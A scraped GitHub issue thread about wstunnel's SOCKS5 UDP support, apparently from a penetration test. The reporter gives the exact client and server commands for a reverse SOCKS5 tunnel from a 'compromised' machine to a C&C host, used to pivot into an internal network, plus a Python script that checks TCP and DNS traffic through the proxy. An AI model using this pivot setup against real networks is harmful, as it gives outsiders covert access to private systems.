Comments (3)
Perfect then :)
I just saw your email this morning btw, I don't check it often ^^.
You may want to use version 9.2.1, I fix a buffer allocation for socks5 udp, even if for tunneling dns traffic it should be fine.
Regarding how socks5 works for UDP, it is a bit weird. You need in fact both protocol, TCP and UDP.
- You establish a TCP cnx on your socks5 server asking to forward udp
- The server respond you with the ip/port of the udp server where it waits for packets
- You send udp packet with extra header, to the server
- The socks5 server extract this extra header, and forward your packets for you.
- When the established TCP cnx to the socks5 is closed, the socks5 server is supposed to terminate the UDP server
That's the RFC, in the project I cheat a bit, as long as you start a socks5 server there will be a UDP server listening. All udp association are requested to contact the ip/port of this udp server.
All that to say, that a valid socks5 client will need TCP and UDP to forward UDP traffic.
Enjoy :)
from wstunnel.
Hello,
Which version are you using ?
Socks5 with UDP association should be supported in the latest release.
https://github.com/erebe/wstunnel/blob/main/src/socks5.rs#L59
You may want to try with this script #188 (comment)
It seems the log is coming from the server, are you trying to do reverse socks5 tunnel ?
If you don't manage to make it works, would you ming trying to describe the setup, so I can try to reproduce the issue.
Also start client and server with --log-lvl=debug
to get more logs regarding what is happening
from wstunnel.
Below the version that I am using:
└─# ./wstunnel -V
wstunnel 9.2.0
Yes I am using the reverse socks5 tunnel. Both ends of the connections are Kali Linux instances. Here is the setup:
-
Box C&C is on the internet and supposed to receive
wstunnel
connections from a compromised network./wstunnel server --log-lvl=debug ws://0.0.0.0:6001
-
Box compromised is in the target network, and has access to
192.168.250.0/24
, with192.168.250.254
being the DNS server. That box has access to the internet./wstunnel client --log-lvl=debug -R socks5://127.0.0.1:4000 ws://PU.BL.IC.IP:6001
After the last command is launched, the SOCKS5 server spins-up on Box C&C. As you suggested, I tried this DNS UDP test script to see if the SOCKS proxy is working:
import socket
import time
import socks
TARGET = "1.1.1.1"
def check_tcp() -> None:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
s.set_proxy(socks.SOCKS5, "127.0.0.1", 4000)
print(f"Sending HTTP request to {TARGET}")
start = time.time()
s.connect((TARGET, 80))
s.send(b"GET / HTTP/1.1\r\nHost: " + TARGET.encode() + b"\r\n\r\n")
data = s.recv(1024)
if not data:
print("No data received")
elif not data.startswith(b"HTTP/1.1 "):
print("Invalid response received")
else:
print("Response received")
end = time.time()
s.close()
print(f"Time: {round((end - start) * 1000, 2)} ms")
def check_udp() -> None:
s = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM)
s.set_proxy(socks.SOCKS5, "127.0.0.1", 4000)
req = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x05\x62\x61\x69\x64\x75\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"
TARGET = "192.168.250.254"
print(f"Sending DNS request to {TARGET}")
start = time.time()
s.sendto(req, (TARGET, 53))
(rsp, address) = s.recvfrom(4096)
if address[0] == TARGET and address[1] == 53 and rsp[0] == req[0] and rsp[1] == req[1]:
print("UDP check passed")
else:
print("Invalid response")
end = time.time()
s.close()
print(f"Time: {round((end - start) * 1000, 2)} ms")
if __name__ == "__main__":
check_tcp()
check_udp()
Now the fun part:
- If I run the test script from the Box C&C: TCP and UDP successfully go through the SOCKS5 proxy via wstunnel.
- If I forward my local 4000 port to port 4000 on the C&C box and run the test script locally, only TCP works
I think the issue I had was that I forwarded ports with SSH, which only supports TCP, and SOCKS relay UDP via UDP, even though I was pretty sure it was using TCP to pipe UDP datagrams.
If I spin-up the SOCKS5 server on my host, I don't have any issue anymore, and I am able to mount a virtual networking stack to transparently forward UDP through SOCKS5/wstunnel.
Thank you for the answer ! You can close the issue if you don't have any other comment, but I would be interested to learn if UDP actually requires a UDP connection to the SOCKS proxy to perform UDP association. I can't remember where I did read that it was possible.
from wstunnel.
Related Issues (20)
- test
- fsdfdsfdfsdf
- test HOT 1
- [Feature Request] Add Authentication Support for SOCKS Service in wstunnel Client HOT 12
- Auto-generate remote port HOT 1
- Need help to setup for android HOT 1
- Need help for android HOT 7
- Binding Apache with wstunnel server HOT 2
- Please increase version support for the Openwrt system platform in wstunnel. HOT 1
- I want to add static route in android HOT 4
- panic (core dumped) (version 9.7.3) HOT 5
- Verify the settings HOT 1
- How Add login/password support?? HOT 5
- How to use custom tls certificate private-key HOT 6
- Forward Traffic to Another HTTP Proxy HOT 8
- Forward Traffic to Another HTTP Proxy with Authentication Using wstunnel HOT 1
- Local to remote `tproxy+tcp` failed to do websocket handshake with the server HOT 5
- Under openwrt program do not run in background without nohup. HOT 1
- wstunnel::tunnel::server: error while decoding jwt for tunnel info Err(Error(InvalidToken)) header None HOT 1
- wstunnel::tunnel::server: error while decoding jwt for tunnel info Err(Error(InvalidToken)) header None HOT 3
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from wstunnel.